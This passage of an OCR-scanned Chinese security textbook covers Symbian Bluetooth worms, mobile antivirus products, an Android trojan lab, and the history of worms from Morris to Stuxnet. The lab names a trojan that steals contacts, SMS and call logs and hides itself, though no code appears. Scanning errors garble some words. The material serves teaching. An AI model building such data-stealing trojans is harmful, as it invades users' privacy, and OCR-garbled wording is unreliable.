了 Skulls, 手 机 只 有 呼叫 和 应 答 可 以 使 用 ,所 有 需要 某 个 系统 应 用 程序 的 功能 ,如 SMS 和 
MMS 信息 、 网 页 浏览 和 照相 功能 都 将 无 法 使 用 。 

病毒 的 主要 文件 命名 为 "Extended theme. SIS” .自称 为 Nokia 7610 智能 手机 的 主题 管 
理 器 ,病毒 作者 是 “Tee-222”。 

9. Lasco 系列 恶意 代码 

Lasco 也 是 一 个 使 用 蓝牙 传播 的 蠕虫 。 病 毒 感染 运行 于 支持 60 系列 平台 的 Symbian 
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手机 。Lasco 通过 蓝牙 连接 复制 ,作为 包含 蠕虫 的 velasco. sis 文件 到 达 手 机 收 信箱 。 当 用 
户 点 击 velasco. sis 并 选择 安装 时 ,蠕虫 激活 并 开始 通过 蓝牙 寻找 新 的 手机 以 进行 感染 。 当 
Lasco 蠕虫 发 现 另 一 个 蓝牙 手机 时 ,只 要 目标 手机 在 范围 内 , 它 就 开始 向 其 发 送 复制 的 
velasco. sis 文件 。 像 Cabir. H 病毒 一 样 ,Lasco. A 在 第 一 个 目标 离开 范围 后 ,能 够 发 现 新 目 
标 。 除 了 通过 蓝牙 发 送 自身 外 ,Lasco. A 也 能 够 通过 将 自身 嵌入 手机 中 发 现 的 SIS 文件 来 
复制 。 一 个 感染 的 SIS 文件 被 复制 到 另 一 个 手机 上 ,Lasco. A 安装 会 在 首次 安装 任务 内 部 
开始 ,询问 用 户 是 否 安装 Velasco。 


6.6 移动 终端 恶意 代码 的 防范 


了 解 了 移动 终端 恶意 代码 的 危害 , 接 下 来 需要 关心 的 问题 就 是 如 何 防范 这 些 恶 意 代 码 ， 
使 自己 的 手持 设备 尽量 免 受 或 少 受 安全 威胁 。 其 主要 防范 措施 如 下 。 

1. 注意 来 电信 息 

当 对 方 的 电话 打 过 来 时 ,正常 情况 下 ,屏幕 上 显示 的 应 该 是 来 电 电话 号 码 。 如 果 用 户 发 
现 显 示 别 的 字样 或 奇异 的 符号 ,应 不 回答 或 立即 把 电话 关闭 。 

2. 谨慎 网 络 下 载 

恶意 代码 要 想 侵 入 终端 设备 ,捆绑 到 下 载 程 序 上 是 一 个 重要 途径 。 因 此 , 当 用 户 经 手机 
上 网 时 ,尽量 不 要 下 载 信息 和 资料 ,如 果 需 要 下 载 手机 铃声 或 图 片 , 应 该 到 正规 网 站 进行 下 
载 ,即使 出 现 问题 也 可 以 找到 源头 。 

3. 不 接收 怪异 短信 

短信 息 (彩信 ) 中 可 能 存在 着 恶意 代码 ,短信 息 的 收发 越 来 越 成 为 移动 通信 的 一 个 重要 
方式 ,然而 短信 息 也 是 感染 手机 恶意 代码 的 一 个 重要 途径 。 当 用 户 接 到 怪异 的 短信 时 应 当 
立即 删除 。 

4. 关闭 无 线 连 接 

采用 蓝牙 技术 和 红外 技术 的 手机 与 外 界 ( 包 括 手机 之 间 , 手 机 与 计算 机 之 间 ) 传 输 数据 
更 加 便捷 和 频繁 ,但 对 自己 不 了 解 的 信息 来 源 ,应 该 关 掉 蓝牙 或 红外 等 无 线 设备 。 如 果 发 现 
自己 的 蓝牙 或 红外 手机 出 现 了 恶意 代码 ,应 及 时 向 厂商 或 软件 公司 询问 并 安装 补丁 。 

5. 关注 安全 信息 

关注 主流 信息 安全 厂商 提供 的 资讯 信息 ,及 时 了 解 智能 移动 终端 设备 病毒 的 发 展现 状 
和 发 作 现 象 ,做 到 防 患 于 未 然 。 


6.7 移动 终端 安全 防护 工具 


随 着 智能 手机 恶意 代码 的 肆意 传播 和 产生 的 严重 危害 ,在 用 户 提高 安全 意识 和 做 出 安 
全 反应 的 同时 ,移动 终端 恶意 代码 也 引起 了 国内 外 的 安全 厂商 和 手机 生产 商 的 高 度 重视 。 
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各 个 安全 厂商 纷纷 推出 了 运行 于 智能 手机 平台 的 安全 软件 。 
6.7.1 国外 移动 终端 安全 防护 工具 


1. BitDefender 手机 杀毒 软件 

BitDefender 手机 杀毒 软件 是 用 来 保护 移动 终端 免 受 恶 意 代码 入 侵 的 。 该 软件 主要 包 
括 两 个 独立 的 模块 : 病毒 查 杀 模块 和 自动 更 新 模块 。 病 毒 查 杀 模块 运行 于 移动 终端 设备 
上 ,并 为 设备 提供 实时 保护 。 自 动 更 新 模块 运行 于 PC 上 ,用 来 安装 配置 移动 设备 上 的 病毒 
查 杀 模 块 ,同时 提供 病毒 库 更 新 功能 。 其 主要 特征 是 实时 保护 、 病 毒 扫 描 和 清除 、 容 易 更 新 
以 及 专业 技术 支持 。 

2. F-Secure 手机 杀毒 软件 

芬兰 的 F-Secure Corporation 在 Cabir 病毒 被 发 现 后 即 投 入 手机 病毒 查 杀 市 场 , 现 已 经 
开发 出 涵盖 主要 智能 手机 平台 的 手机 安全 产品 。 诺 基 亚 公司 也 宣布 ,为 了 更 好 地 维护 手机 
安全 ,在 其 S60 3rd 版 本 的 手机 上 统一 安装 F-Secure 公司 的 反 病 毒 软件 。 而 且 今 后 凡是 代 
号 为 下 系列 的 手机 都 可 以 直接 从 诺基亚 公司 网 站 的 目录 服务 中 下 载 反 病毒 客户 端 。N71 
系列 手机 的 反 病 毒 软 件 则 被 事先 安置 在 手机 的 储存 卡 上 和 手机 一 起 出 售 。 

3. McAfee Mobile Security 

McAfee Mobile Security 是 专 为 移动 生态 系统 设计 构造 和 实施 的 平台 ,可 前 瞻 性 地 保 
护 移动 设备 免 受 安 全 威胁 ,漏洞 和 技术 滥用 的 侵扰 。 它 让 制造 商 有 机 会 增加 输入 来 源 、 使 自 
己 的 设备 独树一帜 以 及 提供 高 品质 的 产品 。 它 能 够 在 200ms 内 检测 到 恶意 软件 。 在 发 现 
病毒 时 , 它 会 清除 病毒 ,防止 其 传播 。 通 过 保障 客户 的 移动 网 络 设备 的 安全 ,来 保障 运营 商 
合作 伙伴 的 网 络 安 全 。McAfee Virus Scan Mobile 的 安装 和 运行 时 要 求 非常 低 , 租 入 式 版 
本 所 占用 的 设备 空间 不 超过 500 KB。 

4. Trend Micro Mobile Security 

总 部 位 于 日 本 东京 和 美国 硅谷 的 Trend Micro Corporation 针对 智能 手机 用 户 推出 了 
免费 的 Trend Micro Mobile Security 解决 方案 ,通过 这 种 解决 方案 ,趋势 能 够 为 客户 通信 、 
娱乐 设备 提供 实时 、 可 在 线 更 新 的 安全 保护 。 趋 势 科技 的 移动 安全 精灵 为 智能 数字 移动 设 
备 提 供 了 各 种 病毒 威胁 保护 以 及 SMS 垃圾 短信 过 滤 功 能 。 

5. Kaspersky 手机 安全 软件 

俄罗斯 的 Kaspersky Lab 已 经 推出 针对 Symbian OS 智能 手机 的 杀毒 软件 。 这 个 软件 
名 为 “AntirVirus Mobile 2. 0”, 它 能 够 阻止 手机 可 疑 程序 的 运行 。 安装 了 Anti-Virus 
Mobile 2. 0 的 用 户 可 以 通过 WAP 或 者 HTTP 方式 下 载 卡巴 斯 基 的 病毒 升级 库 。 据 悉 ， 
Anti-Virus Mobile 2. 0 兼容 Symbian 6.1、7.0s、8.0、8.1OS 以 及 Series 60 手机 平台 。 

6. Symantec 手机 安全 软件 

Symantec Mobile Security Corporate Edition for Symbian 为 智能 型 手机 提供 整合 式 防 
毒 及 防火 墙 功 能 。 它 针对 所 有 Symbian 档案 型 的 恶意 威胁 (如 病毒 、 木 马 程序 ) 提 供 了 主动 
式 防护 。 集 中 化 管理 让 系统 管理 员 能 执行 安全 政策 ,而 自动 更 新 则 可 让 装置 上 的 防护 能 力 
维持 在 最 新 状态 。 系 统 的 主要 功能 是 实时 的 自动 及 手动 病毒 扫描 功能 可 保护 智能 型 手机 档 
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案 系 统 中 储存 的 档案 。 防 火 墙 使 用 通信 协议 及 通信 端口 过 滤 ,保护 传输 中 的 数据 及 应 用 程 
序 。 透 过 LiveUpdate 提供 无 线 安全 与 应 用 程序 更 新 功能 ,让 装置 上 的 防护 能 力 保持 在 最 新 


6.7.2 国内 移动 终端 安全 防护 工具 


1. 360 手机 卫士 

360 手机 卫士 是 一 款 免 费 的 手机 安全 软件 , 集 防 垃 圾 短信 、 防 骚扰 电话 、 防 隐私 泄露 ,对 
手机 进行 安全 扫描 、 联 网 云 查 杀 恶 意 软件 ,软件 安装 实时 检测 流量 使 用 全 掌握 .系统 清理 手 
机 加 速 、 归 属地 显示 及 查询 等 功能 于 一 身 。 为 用 户 带 来 全 方位 的 手机 安全 及 隐私 保护 ,是 手 
机 的 必 备 软件 。 目 前 ,提供 Android、iPhone、Symbian 等 多 个 版 本 。 由 于 360 最 先 在 计算 机 
杀毒 领域 提供 免费 服务 , 且 技术 过 硬 , 拥 有 大 量 的 用 户 群 。 

2. 腾讯 手机 管家 

腾讯 手机 管家 ( 原 QQ 手机 管家 ) 是 腾讯 旗下 一 款 永 久 免 费 的 手机 安全 与 管理 软件 。 功 
能 包括 病毒 查 杀 、 驭 扰 拦截 .软件 权限 管理 .手机 防盗 及 安全 防护 ,用 户 流量 监控 .空间 清理 、 
体检 加 速 .软件 管理 等 高 端 智 能 化 功能 。 其 杀毒 云 引擎 更 强大 ,基于 海量 云 安全 数据 的 杀毒 
云 引 擎 ,对 手机 可 以 全 盘查 杀 病 毒 。 

据 QuestMobile 监测 数据 显示 ,在 2015 年 6 月 安 卓 端 APP 月 度 活跃 用 户 数 与 渗透 率 
两 项 重要 数据 上 ,腾讯 手机 管家 均 已 跃 居 行 业 第 一 。2015 年 8 月 APP(Android 十 iOS) 月 度 
活跃 用 户 数 达到 12 011 万 ,位 居 手 机 安全 APP 行业 第 一 。 

3. 百度 手机 卫士 

百度 手机 卫士 ( 原 安 卓 优化 大 师 ) 是 Android 平台 第 一 款 系 统 优化 类 工具 ,诞生 至 今 已 
有 3 年 ,累积 了 超过 2 亿 的 忠实 用 户 。 百 度 手 机 卫士 是 一 款 功能 超 强 的 手机 安全 软件 ,为 用 
户 免费 提供 系统 优化 .手机 加 速 , 垃 圾 清理 .骚扰 电话 拦截 .骚扰 短信 甄别 .手机 上 网 流量 保 
护 .流量 监控 、 恶 意 软件 查 杀 等 优质 服务 。 

百度 手机 卫士 以 病毒 查 杀 率 高 达 99. 7% 的 结果 ,通过 了 国际 权威 安全 评测 机 构 
AV-Test 的 评测 ,并 摘 得 桂冠 。2014 年 5 月 百度 手机 卫士 以 100% 的 检测 率 、 零 误 报 的 完美 
成 绩 , 连 续 四 次 斩获 AV-Test 的 评测 桂冠 。 


4. 金山 手机 卫士 
金山 手机 卫士 是 较 早 的 手机 杀毒 软件 之 一 ,以 手机 安全 为 核心 ,提供 有 流量 监控 、 恶 意 
扣 费 拦截 及 杀毒 功能 。 


金山 手机 卫士 是 金山 安全 软件 有 限 公 司 研发 的 一 款 手 机 安全 产品 。 通 过 关闭 运行 中 软 
件 , 印 载 已 安装 软件 ,清理 垃圾 文件 ,清理 短信 收发 件 箱 等 加 快手 机 运行 速度 ; 通过 检查 系 
统 漏洞 ,扫描 风险 软件 ,检查 扣 费 记录 等 解除 用 户 的 手机 安全 隐患 ,保证 手机 及 话费 安全 ; 
同时 还 提供 包括 系统 信息 查看 .进程 管理 .重启 手机 、 内 存 压缩 等 实用 功能 。 

5. LBE 安全 大 师 

LBE 安全 大 师 是 Android 平台 上 首 款 主动 式 防御 软件 ,第 一 款 具备 实时 监控 与 拦截 能 
力 的 手机 安全 软件 。LBE 安全 大 师 基 于 业界 首创 的 Android 平台 API 拦截 技术 ,能 够 实时 
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监控 与 拦截 系统 中 的 敏感 操作 ,动态 拦截 来 自己 知 和 未 知 的 各 种 威胁 ,避免 各 类 吸 费 软件 、 
广告 软件 乃至 木马 病毒 窃取 用 户 手 机 内 的 隐私 信息 以 及 可 能 产生 的 经 济 损失 。 

相 比 同类 软件 ,LBE 的 RAM 占用 更 低 ,ROM 占用 更 小 ,安装 包 体积 也 是 其 他 安全 软 
件 的 一 半 ,更 加 省 电 \ 小 巧 .简洁 。 


6.8 综合 实验 
综合 实验 七 : Android 手机 木马 实验 


【实验 目的 】 

(1) 掌握 手机 木马 程序 的 机 制 。 

(2) 了 解 Android 程序 的 编制 。 

【实验 平台 】 

(1) 操作 系统 环境 : Windows 7。 

(2) 开发 工具 : Eclipse SDK 3.7.2。 

(3) 开发 环境 : Android Development Toolkit 16. 0. 1 。 

(4) 测试 环境 : Android 模拟 器 4. 0. 3。 

【实验 资源 】 

代码 位 置 :“ 本 书 配 套 素材 目录 :\ comprehensive\ch-8\androidhorse”。 

【实验 内 容 】 

(1) 在 计算 机 上 编译 本 书 配套 素材 目录 中 的 源 代码 。 

(2) 把 编译 后 的 APK 包 安 装 到 Android 手机 上 。 当 然 , 也 可 以 直接 安装 在 Android 的 
模拟 器 上 ,用 模拟 器 进行 测试 。 

(3) 测试 的 主要 功能 有 各 种 关键 信息 的 获取 ,例如 ,通讯 录 、 短 信息 、 通 话 记录 ,任务 安 
排 等 关键 信息 的 获取 ,测试 程序 的 自动 运行 ,测试 程序 的 隐藏 等 。 


6.9 习 题 
一 、 填 空 题 
1. 移动 终端 恶意 代码 以 移动 终端 为 感染 对 象 ,以 和 为 平台 ,通过 无 
线 或 有 线 通信 等 方式 ,对 移动 终端 进行 攻击 ,从 而 造成 移动 终端 异常 的 各 种 不 良 程序 代码 。 
2. 根据 功能 不 同 ,移动 终端 主要 包括 和 两 大 类 。 
3. 根据 近 两 年 的 市 场 份额 的 高 低 , 两 大 智能 手机 操作 系统 分 别 为 
和 
二 、 选择 题 
1. 总 结 移动 终端 的 恶意 代码 感染 机 制 , 其 感染 途径 主要 分 为 ( 由 
A. 终端 一 终端 B. 终端 一 网 关 一 终端 
C. PC( 计 算 机 ) 一 终端 D. 终端 一 PC 
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2. 移动 终端 的 恶意 代码 的 攻击 方式 分 为 (  )。 


A. 短信 息 攻 击 B. 直接 攻击 手机 
C. 攻击 网 关 D. 攻击 漏洞 
E. 木马 型 恶意 代码 

三 、 思 考题 


1. 什么 是 移动 终端 恶意 代码 ,移动 终端 恶意 代码 有 哪些 攻击 方式 ? 
2. 手机 设计 或 手机 控制 软件 存在 哪些 漏洞 ? 
3， 试 论述 防范 移动 终端 恶意 代码 的 方法 。 


第 7 章 里 时 


提起 蠕虫 (Worm) ,给 大 家 印象 最 深 的 就 是 冲击波” 震荡 波 ”“ 红 色 代 码 ” 及 “ 尼 姆 达 ” 
等 著名 恶意 代码 。 这 些 著 名 的 蠕虫 在 2003 和 2004 年 达到 高 发 期 ,并 给 整个 信息 安全 领域 
留 下 了 不 可 磨灭 的 印记 。 实 际 上 英里 斯 蠕虫 (Morris Worm) 早 于 20 世纪 80 年 代 就 在 
DARPA 网 上 产生 了 .2003 一 2005 年 则 是 蠕虫 发 展 的 高 峰 期 。 

经 过 多 年 的 沉寂 后 ,2010 年 的 “ 震 网 ”(Stuxnet) 又 把 蠕虫 推 到 了 前 台 。 由 于 震 网 病毒 
是 针对 工业 控制 网 络 ,因此 引起 了 社会 各 界 关注 。 随 后 出 现 的 “火焰 ”(Worm. Win32. 
Flame) 据 称 和 震 网 属于 同 源 病毒 。 

2017 年 爆发 的 WannaCry 是 典型 的 勒索 型 恶意 代码 ,但 其 传播 能 力 完 全 是 利用 了 蠕虫 
的 传播 技术 ,由 此 可 见 , 蠕 虫 的 传播 技术 仍然 发 挥 着 巨大 影响 。 

本 章 将 简单 介绍 蠕虫 这 种 特殊 恶意 代码 的 一 些 基 本 概念 、 制 作 思想 、 编 程 技术 以 及 必要 
的 防范 方法 等 。 

本 章 学 习 目标 

(1) 掌握 蠕虫 的 概念 。 

(2) 掌握 蠕虫 的 发 展 过 程 。 

(3) 熟悉 蠕虫 的 编制 。 


7.1 蠕虫 的 基本 概念 


蠕虫 这 个 名 词 由 来 已 入。 在 1982 年 ,Shock 和 Hupp 根据 The Shockwave Rider 一 书 
中 的 概念 提出 了 一 种 “蠕虫 (Worm) 恶 意 程序 的 思想 。 

蠕虫 是 恶意 代码 的 一 种 , 它 的 传播 通常 不 需要 所 谓 的 激活 。 它 通过 分 布 式 网 络 来 散播 
特定 的 信息 或 错误 ,进而 造成 网 络 服务 遭 到 拒绝 并 发 生死 锁 。 关 于 蠕虫 的 传播 理论 和 模型 
请 参考 本 书 的 第 2 章 。 

一 般 认 为 ,蠕虫 是 一 种 通过 网 络 传播 的 恶性 病毒 , 它 具 有 恶意 代码 的 一 些 共性 ,如 传播 
性 、 隐 项 性 和 破坏 性 等 。 同 时 蠕虫 还 具有 自己 特有 的 一 些 特征 ,例如 ,不 利用 文件 寄生 (有 的 
只 存在 于 内 存 中 )、 对 网 络 造 成 拒绝 服务 ,以 及 和 黑客 技术 相 结 合 等 。 在 破坏 程度 上 ,蠕虫 病 
毒 也 不 是 普通 病毒 所 能 比拟 的 ,蠕虫 病毒 可 以 在 数 小 时 内 草 延 至 整个 因特网 ,并 造成 网 络 
瘫痪 。 


7.1.1 蠕虫 的 分 类 


根据 攻击 对 象 不 同 可 以 将 蠕虫 分 为 两 种 : 一 种 是 面向 企业 用 户 和 局 域 网 的 ,这 种 恶意 
代码 利用 系统 漏洞 ,主动 进行 攻击 ,可 以 使 整个 因特网 瘫痪 。 它 主要 以 “红色 代码 “ 尼 姆 达 ” 
以 及 最 新 的 “SQL 蠕虫 王 ” 为 代表 。 另 外 一 种 是 针对 个 人 用 户 的 ,通过 网 络 (主要 是 电子 邮 
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件 、 恶 意 网 页 形式 ) 迅 速 传播 的 蠕虫 ,以 “ 爱 虫 “ 求 职 信和 ”为 代表 。 

在 这 两 种 蠕虫 中 ,第 一 种 具有 很 大 的 主动 攻击 性 ,而 且 爆 发 也 有 一 定 的 突然 性 ,但 相对 
来 说 , 查 杀 这 种 恶意 代码 并 不 是 很 难 。 第 二 种 恶意 代码 的 传播 方式 比较 复杂 和 多 样 ,少数 利 
用 了 微软 的 应 用 程序 的 漏洞 ,更 多 的 是 利用 社会 工程 学 对 用 户 进行 欺诈 和 诱骗 ,这 样 的 蠕虫 
造成 的 损失 是 非常 大 的 ,同时 也 是 很 难 根除 的 。 


7.1.2 蠕虫 和 其 他 恶意 代码 的 关系 


蠕虫 一 般 不 采取 利用 PE 格式 插入 文件 的 方法 ,而 是 复制 自身 并 在 因特网 中 进行 传播 。 
传统 计算 机 病毒 的 传染 能 力主 要 是 针对 单 台 计算 机 内 的 文件 系统 而 言 ,而 蠕虫 的 传染 目标 
是 因特网 内 的 所 有 计算 机 。 局 域 网 条 件 下 的 共享 文件 夹 .电子 邮件 、 网 络 中 的 恶意 网 页 ,大 
量 存在 着 漏洞 的 服务 器 等 都 是 蠕虫 传播 的 良好 途径 。 因 特 网 的 发 展 也 使 得 蠕虫 可 以 在 几 个 
小 时 内 蔓延 至 全 球 ,而 且 蠕 虫 的 主动 攻击 性 和 突然 爆发 性 使 得 人 们 手足 无 措 。 表 7-1 列 出 
了 蠕虫 病毒 和 传统 计算 机 病毒 的 区 别 。 


表 7-1 蠕虫 和 传统 病毒 0 的 区 别 


比较 项 目 传统 病毒 蠕虫 
存在 形式 寄存 文件 独立 程序 
传染 机 制 宿主 程序 运行 主动 攻击 
传染 对 象 本 地 文件 计算 机 


特洛伊 木马 也 是 一 类 特殊 的 恶意 代码 。 蠕 虫 和 特洛伊 木马 之 间 的 联系 也 是 非常 有 趣 
的 。 一 般 而 言 ,这 两 者 的 共性 都 是 自我 传播 ,都 不 感染 其 他 文件 , 即 不 需要 把 自己 附着 在 其 
他 宿主 文件 上 。 在 传播 特性 上 ,它们 之 间 的 微小 区 别 是 : 特洛伊 木马 需要 用 户 上 当 受 骗 来 
进行 传播 ,而 蠕虫 则 不 是 。 蠕 虫 包含 自我 复制 程序 , 它 利用 所 在 的 系统 进行 传播 。 但 也 有 些 
资料 认为 ,蠕虫 就 是 木马 ,木马 就 是 蠕虫 。 

但 编者 认为 ,蠕虫 和 特洛伊 木马 的 主要 区 别 应 该 体现 在 破坏 目的 上 。 与 传统 计算 机 病 
毒 类 似 , 蠕 虫 的 破坏 目的 是 纯粹 的 破坏 ,例如 ,耗费 网 络 资源 .删除 用 户 数据 等 。 而 木马 的 破 
坏 目的 是 窃取 ,秘密 地 窃取 用 户 的 信息 。 这 也 是 为 什么 难以 统计 特洛伊 木马 危害 程度 的 
原因 。 


7.1.3 ”蠕虫 的 危害 


计算 机 网 络 系统 的 建立 是 为 了 使 多 台 计 算 机 能 够 共享 数据 资料 和 外 部 资源 ,然而 这 也 
给 计算 机 蠕虫 带 来 了 更 为 有 利 的 生存 和 传播 的 环境 。 

在 网 络 环 境 下 ,蠕虫 可 以 按 指数 增长 模式 进行 传染 。 它 侵入 计算 机 网 络 , 可 以 导致 计算 
机 网 络 效率 急剧 下 降 、 系 统 资 源 遭 到 严重 破坏 , 短 时 间 内 造成 网 络 系统 的 瘫痪 ,因此 网 络 环 
境 下 蠕虫 防治 曾经 是 计算 机 防毒 领域 的 研究 重点 。 接 下 来 给 出 几 个 典型 的 蠕虫 案例 。 

1988 年 11 月 发 生 了 第 一 起 蠕 毒 事件 。 美 国 康 奈 尔 大 学 的 学 生 罗 伯 特 ， 莫 里 斯 编写 了 
第 一 个 网 络 恶 意 代 码 一 一 莫 里 斯 蠕虫 (Morris Worm)。 莫 里 斯 蠕虫 尝试 以 多 种 手段 获得 进 


中 ”传统 病毒 是 指 感染 可 执行 文件 数据 文件 和 引导 区 的 计算 机 病毒 。 
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入 新 网 络 的 权限 ,其 中 最 著名 的 是 finger 和 sendmail 漏洞 。 该 恶意 代码 在 美国 感染 了 超过 
6000 台 计 算 机 (包括 美国 国家 航空 和 航天 局 研究 院 、 军 事 基地 和 部 分 大 学 的 计算 机 ) ,并 使 
它们 部 分 瘫痪 。 巾 于 网 络 瘫痪 造成 的 损失 预计 超过 9600 万 美元 。 

1999 年 ,SirCam 蠕虫 爆发 。 该 恶意 代码 依靠 电子 邮件 传播 。 打 开 带 毒 附件 后 , 它 会 自 
动 附着 在 正常 文件 上 。 发 作 时 会 删除 计算 机 中 的 所 有 文件 ,并 根据 用 户 的 邮件 地 址 自动 发 
送 病毒 附件 。 据 不 完全 统计 ,SirCam 所 造成 的 经 济 损失 约 为 12 亿美 元 。 

2001 年 7 月 “红色 代码 ”(Code Red) 以 及 “红色 代码 二 代 ”(Code Red 了 ) 出 现 。 该 恶意 
程序 主要 针对 因特网 上 的 服务 器 。 该 恶意 代码 能 够 迅速 传播 ,并 造成 大 范围 的 访问 速度 下 
降 甚 至 阻 断 。“ 红 色 代 码 ? 造 成 的 破坏 主要 是 修改 网 页 ,攻击 网 络 上 的 其 他 服务 器 。 被 攻击 
的 服务 器 又 可 以 继续 攻击 其 他 服务 器 。 

据 统 计 ,“ 求 职 信 ”“ 情 书 ”“ 红 色 代 码 ” 等 蠕虫 病毒 的 生产 性 损失 额 分 别 为 90 亿美 元 、 
88 亿美 元 ,26 亿美 元 。 麦 动 全 世界 的 蠕虫 *2003 蠕虫 王 ” 造 成 的 全 世界 范围 内 损失 额 也 高 
达 12 亿美 元 。 

2003 年 下 半年 在 全 球 发 作 的 “冲击 波 ” 蠕 虫 ,当选 为 当年 危害 最 大 的 计算 机 恶意 代码 。 
“冲击 波 ” 又 名 Lovsan 或 MSBlast。 它 利用 Windows 2000/Windows XP 的 漏洞 进行 传播 ， 
被 激活 后 会 向 用 户 展示 一 个 恶意 对 话 框 ,提示 系统 将 关闭 。 该 恶意 代码 的 另 一 个 特点 是 , 它 
可 以 在 特定 日 期 向 Windows 升级 网 站 (Windowsupdate. com) 发 起 DDoS( 分 布 式 拒绝 服 
务 ) 攻 击 。 

2004 年 “震荡 波 ” 蠕 虫 出 现 , 它 也 利用 了 未 升级 的 Windows 2000/Windows XP 的 一 个 
系统 漏洞 。 该 恶意 代码 曾 导 致 法 国 一 些 新 闻 机 构 关 闭 卫星 通信 、Delta 航空 公司 取消 数 个 航 
班 。 其 带 来 的 经 济 损失 以 千 万 美元 计算 。 

2010 年 的 “ 震 网 ”蠕虫 以 全 新 的 视角 给 世人 展示 了 蠕虫 这 种 恶意 代码 的 震慑 力 。 该 里 
虫 综合 利用 了 Windows 系统 的 7 个 漏洞 进行 传播 ,其 最 终 目 标 是 攻击 安装 了 Simatic 
WinCC 软件 的 主机 。 据 赛 门 铁 克 统计 ,2010 年 7 月 ,伊朗 感染 * 震 网 ?的 主机 为 25% ,同年 
9 月 则 高 达 60% 。 据 称 该 恶意 代码 专门 定向 破坏 伊朗 核电 站 离心 机 等 要 害 目 标 , 具 有 鲜明 
的 地 域 性 和 目的 性 。 

2011 年 年 底 又 发 现 了 “ 震 网 ”病毒 的 新 变种 Duqu, 其 攻击 目标 通常 是 工业 控制 领域 的 
元 器 件 制造 商 。2012 年 ,又 出 现 了 威力 强大 的 恶意 代码 “火焰 ”(Flame) , 它 也 是 震 网 的 变 
种 ,并 在 中 东 地 区 大 范围 传播 。 


7.1.4 “ 震 网 ”蠕虫 


“ 震 网 ”D(CStuxnet) 是 一 种 Windows 平台 上 的 计算 机 蠕虫 ,2010 年 6 月 被 白俄罗斯 的 
安全 公司 VirusBlokAda 发 现 。“ 震 网 ”同时 利用 了 7 个 最 新 漏洞 进行 攻击 ,7 个 漏洞 中 ,有 
5 个 针对 Windows 系统 (其 中 4 个 是 全 新 的 零 日 漏洞 ),2 个 针对 Simatic WinCC 系统 。 

1. 震 网 的 传播 过 程 

“ 震 网 ”的 传播 途径 是 首先 感染 外 部 主机 ; 然后 感染 U 盘 , 利 用 快捷 方式 文件 解析 漏 


四 ” 严 宵 风 . 震 网 引发 的 网 络 安 全 新 思考 . 信息 安全 与 技术 ,2011. 
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洞 ,传播 到 内 部 网 络 ; 在 内 部 网 络 中 ,通过 快捷 方式 解析 漏洞 `RPC 远程 执行 漏洞 .打印 机 
后 台 程 序 服务 漏洞 等 ,实现 联网 主机 之 间 的 传播 ; 通过 伪装 RealTek 和 JMicron 两 大 公司 
的 数字 签名 ,顺利 绕 过 安全 产品 的 检测 ; 最 后 抵达 安装 了 Simatic WinCC 软件 的 主机 , 展 
开 攻击 。“ 震 网 "病毒 能 控制 关键 过 程 并 开启 一 连 串 执行 程序 ,最 终 导致 整个 系统 自我 
毁灭 。 

据 赛 门 铁 克 的 研究 表明 ,截至 2010 年 8 月 6 日 , 几 个 受 影响 的 主要 国家 中 , 受 感染 的 计 
算 机 伊朗 62 867 台 印度尼西亚 13 336 台 、 印 度 6552 台 、 美 国 2913 台 、 澳 大 利 亚 2436 台 、 
英国 1038 台 马来西亚 1013 台 .巴基斯坦 993 台 。 赛 门 铁 克 安 全 响应 中 心 高 级 主任 凯 文 。 
霍 根 (Kevin Hogan) 指 出 ,在 伊朗 约 60% 的 个 人 计算 机 被 感染 ,这 意味 着 其 目标 是 当地 的 工 
业 基 础 设施 。 

2.“ 震 网 ”的 特点 

与 以 往 的 安全 事件 相 比 ,“ 震 网 ”攻击 呈现 出 多 种 特点 。 

(1) 攻击 目标 明确 。 通 常情 况 下 ,蠕虫 的 攻击 价值 在 于 其 传播 范围 的 广阔 性 和 攻击 目 
标的 普遍 性 。“ 震 网 ”的 攻击 目标 既 不 是 开放 主机 ,也 不 是 通用 软件 ,而 是 运行 于 Windows 
平台 , 常 被 部 署 在 与 外 界 隔 离 的 专用 局 域 网 中 ,被 广泛 用 于 钢铁 、 汽 车 ,电力 、 运 输 、 水 利 、 化 
工 \ 石 油 等 核心 工业 领域 ,特别 是 国家 基础 设施 工程 的 Simatic WinCC 数据 采集 与 监视 控制 

专家 称 ,“ 震 网 ”是 一 次 精心 谋划 的 攻击 ,具有 精确 制导 的 “网 络 导弹 "能力 。 

(2) 采用 技术 先进 。“ 震 网 ”病毒 一 下 子 利用 了 微软 操作 系统 的 4 个 零 日 漏洞 ,使 每 一 
种 漏洞 发 挥 了 其 独特 的 作用 。“ 震 网 ”运行 后 ,释放 出 两 个 驱动 文件 伪装 RealTek 和 
JMicron 的 数字 签名 ,以 躲避 杀毒 软件 的 查 杀 ,使 “ 震 网 ?具有 极 强 的 隐身 和 破坏 力 。“ 震 网 ” 
无 须 借 助 网 络 连接 进行 传播 ,只 要 计算 机 操作 员 将 被 病毒 感染 的 U 盘 插 入 USB 接口 ,病毒 
就 会 在 神 不 知 鬼 不 觉 的 情况 下 取得 工业 用 计算 机 系统 的 控制 权 , 代 替 核心 生产 控制 计算 机 
软件 对 工厂 其 他 计算 机 “发 号 施 令 ”。 

专家 称 ,一旦 * 震 网 ?病毒 软件 流入 黑市 出 售 , 后 果 将 不 堪 设 想 。 


7.2 ”蠕虫 的 特征 


蠕虫 和 普通 病毒 不 同 的 是 蠕虫 病毒 往往 能 够 利用 漏洞 ,这 里 的 漏洞 或 者 说 是 缺陷 ,可 以 
分 为 两 种 , 即 软件 上 的 缺陷 和 人 为 的 缺陷 。 软 件 上 的 缺陷 ,如 远程 溢出 、 微 软 IE 和 Outlook 
的 自动 执行 漏洞 等 ,需要 软件 厂商 和 用 户 共同 配合 ,不 断 地 升级 软件 。 而 人 为 的 缺陷 ,主要 
是 指 计算 机 用 户 的 朴 忽 。 这 就 是 所 谓 的 社会 工程 学 , 当 收 到 一 封 带 着 病毒 的 求职 信 邮 件 时 ， 
大 多 数 人 都 会 抱 着 好 奇 去 点 击 。 对 于 企业 用 户 来 说 ,威胁 主要 集中 在 服务 器 和 大 型 应 用 软 
件 的 安全 上 ,而 对 个 人 用 户 而 言 ,主要 是 防范 第 二 种 缺陷 。 蠕 虫 主要 有 以 下 特征 。 

1. 利用 漏洞 主动 进行 攻击 

此 类 病毒 主要 是 “红色 代码 ”和 * 尼 姆 达 ”, 以 及 至 今 依然 肆虐 的 “求职 信 ?” 等 。 由 于 正 浏 
览 器 的 漏洞 (iframe execCommand) ,使 得 感染 了 “ 尼 姆 达 ” 病 毒 的 邮件 在 不 去 手动 打开 附件 
